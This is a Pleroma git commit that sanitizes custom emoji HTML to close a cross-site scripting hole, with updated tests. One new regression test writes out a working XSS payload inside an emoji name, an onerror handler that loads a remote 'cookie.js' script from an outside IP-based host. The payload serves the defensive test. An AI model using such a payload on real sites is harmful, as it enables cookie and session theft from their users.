diff options
| author | William Pitcock <nenolod@dereferenced.org> | 2018-09-02 00:04:09 +0000 |
|---|---|---|
| committer | William Pitcock <nenolod@dereferenced.org> | 2018-09-02 00:04:09 +0000 |
| commit | 834515fb511ecb8021b81f355cb2d629887edeef (patch) | |
| tree | 041c906375fdf1edfc956b9ab3a0a6070575d906 | |
| parent | 3c7280934e3bdca8d5a870dc932406ccd9915d64 (diff) | |
| download | pleroma-834515fb511ecb8021b81f355cb2d629887edeef.tar.gz | |
formatter: don't add XSS emoji
| -rw-r--r-- | lib/pleroma/formatter.ex | 1 | ||||
| -rw-r--r-- | test/formatter_test.exs | 17 | ||||
| -rw-r--r-- | test/web/twitter_api/representers/activity_representer_test.exs | 2 | ||||
| -rw-r--r-- | test/web/twitter_api/views/user_view_test.exs | 2 |
4 files changed, 19 insertions, 3 deletions
diff --git a/lib/pleroma/formatter.ex b/lib/pleroma/formatter.ex index cf2944c38..9be54e863 100644 --- a/lib/pleroma/formatter.ex +++ b/lib/pleroma/formatter.ex @@ -154,6 +154,7 @@ defmodule Pleroma.Formatter do MediaProxy.url(file) }' />" ) + |> HtmlSanitizeEx.basic_html() end) end diff --git a/test/formatter_test.exs b/test/formatter_test.exs index 95558089b..8453b72ac 100644 --- a/test/formatter_test.exs +++ b/test/formatter_test.exs @@ -189,11 +189,26 @@ defmodule Pleroma.FormatterTest do text = "I love :moominmamma:" expected_result = - "I love <img height='32px' width='32px' alt='moominmamma' title='moominmamma' src='/finmoji/128px/moominmamma-128.png' />" + "I love <img height=\"32px\" width=\"32px\" alt=\"moominmamma\" title=\"moominmamma\" src=\"/finmoji/128px/moominmamma-128.png\" />" assert Formatter.emojify(text) == expected_result end + test "it does not add XSS emoji" do + text = + "I love :'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a):" + + custom_emoji = %{ + "'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)" => + "https://placehold.it/1x1" + } + + expected_result = + "I love <img height=\"32px\" width=\"32px\" alt=\"\" title=\"\" src=\"https://placehold.it/1x1\" />" + + assert Formatter.emojify(text, custom_emoji) == expected_result + end + test "it returns the emoji used in the text" do text = "I love :moominmamma:" diff --git a/test/web/twitter_api/representers/activity_representer_test.exs b/test/web/twitter_api/representers/activity_representer_test.exs index 3f85e028b..894d20049 100644 --- a/test/web/twitter_api/representers/activity_representer_test.exs +++ b/test/web/twitter_api/representers/activity_representer_test.exs @@ -126,7 +126,7 @@ defmodule Pleroma.Web.TwitterAPI.Representers.ActivityRepresenterTest do } expected_html = - "<p>2hu</p>alert('YAY')Some <img height='32px' width='32px' alt='2hu' title='2hu' src='corndog.png' /> content mentioning <a href=\"#{ + "<p>2hu</p>alert('YAY')Some <img height=\"32px\" width=\"32px\" alt=\"2hu\" title=\"2hu\" src=\"corndog.png\" /> content mentioning <a href=\"#{ mentioned_user.ap_id }\">@shp</a>" diff --git a/test/web/twitter_api/views/user_view_test.exs b/test/web/twitter_api/views/user_view_test.exs index 24a5c5bca..7075a2370 100644 --- a/test/web/twitter_api/views/user_view_test.exs +++ b/test/web/twitter_api/views/user_view_test.exs @@ -22,7 +22,7 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do test "A user with emoji in username", %{user: user} do expected = - "<img height='32px' width='32px' alt='karjalanpiirakka' title='karjalanpiirakka' src='/file.png' /> man" + "<img height=\"32px\" width=\"32px\" alt=\"karjalanpiirakka\" title=\"karjalanpiirakka\" src=\"/file.png\" /> man" user = %{ user |